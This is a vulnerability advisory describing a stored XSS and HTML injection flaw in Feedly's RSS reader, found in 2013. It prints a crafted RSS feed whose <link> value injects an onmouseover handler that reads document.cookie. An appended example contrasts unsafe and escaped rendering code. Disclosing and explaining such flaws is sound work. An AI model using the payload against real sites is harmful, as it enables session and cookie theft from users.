* Feedly.com HTML Injection and XSS Vulnerability RSS feed
* ========================================================
*
* Site: http://feedly.com
* Discovered by: Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)
* Follow me: http://www.linkedin.com/in/andreamenin
*
* ========================================================


Report-Timeline:
----------------
2013-07-02: Reported to domain's tech contact



Introduction:
-------------
Feedly.com is an RSS feed reader. Once you sign up (local account 
or Google auth), you can add RSS feeds from your preferred web sites, 
including by typing in a feed URL.



Description:
------------
I found this XSS vulnerability and HTML injection by adding a fake RSS, with a 
JavaScript "injection" inside the <link> tag.  I've seen that Feedly.com 
doesn't escape/sanitize the "quotes" inside this tag...
so, I've put something like this:

<link>http://www.bla.l33t/" onmouseover="alert(document.cookie)">bla</a></link>



Full RSS "Exploit" with injection on tag <link>:
------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
<channel>
<item>
<title>Test XSS Vulnerability</title>
<link>http://www.bla.l33t/" onmouseover="alert(document.cookie)">bla</a></link>
<pubDate>Sun, 2 Jul 2013 22:56:41 GMT</pubDate>
<description>XSS TEST, yuk!</description>
</item>
</channel>
</rss>
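
Added example (not part of the original advisory, and not Feedly's code): how a
reader that concatenates the <link> text into an href attribute ends up with an
extra attribute, next to a renderer that validates the URL scheme and escapes
the value. All function names are hypothetical; the sample input is the <link>
text from the feed above.

```javascript
// Hypothetical renderers for one feed item; the names are assumptions for this example.

// Constructed sample: the <link> text from the feed above, as a parser would hand it over.
const feedLink = 'http://www.bla.l33t/" onmouseover="alert(document.cookie)">bla</a>';
const feedTitle = 'Test XSS Vulnerability';

// Vulnerable pattern: feed text concatenated straight into an attribute value.
function renderItemUnsafe(link, title) {
  return '<a href="' + link + '">' + title + '</a>';
}

// Escape every character that can end an attribute value or open a tag.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
  }[c]));
}

// Accept only absolute http(s) URLs; the URL parser also percent-encodes
// quotes, spaces and angle brackets found in the path.
function safeHref(link) {
  try {
    const u = new URL(String(link).trim());
    return (u.protocol === 'http:' || u.protocol === 'https:') ? u.href : null;
  } catch (e) {
    return null; // not parseable as an absolute URL
  }
}

// Hardened pattern: validated URL, escaped attribute value, escaped link text.
function renderItemSafe(link, title) {
  const href = safeHref(link);
  const text = escapeHtml(title);
  if (href === null) return '<span>' + text + '</span>';
  return '<a href="' + escapeHtml(href) + '">' + text + '</a>';
}

// Rough check for this demo only: attribute names present on the first tag.
function firstTagAttributes(html) {
  const tag = html.slice(0, html.indexOf('>'));
  return [...tag.matchAll(/\s([a-zA-Z-]+)="[^"]*"/g)].map(m => m[1]);
}

console.log(firstTagAttributes(renderItemUnsafe(feedLink, feedTitle)));
console.log(firstTagAttributes(renderItemSafe(feedLink, feedTitle)));
```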



Screenshot XSS Vulnerability:
-----------------------------
http://goo.gl/fs2Vg



CREDITS:
---------
These vulnerabilities have been discovered
by Andrea Menin (base64 @: bWVuaW4uYW5kcmVhQGdtYWlsLmNvbQ==)



LEGAL NOTICES:
---------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.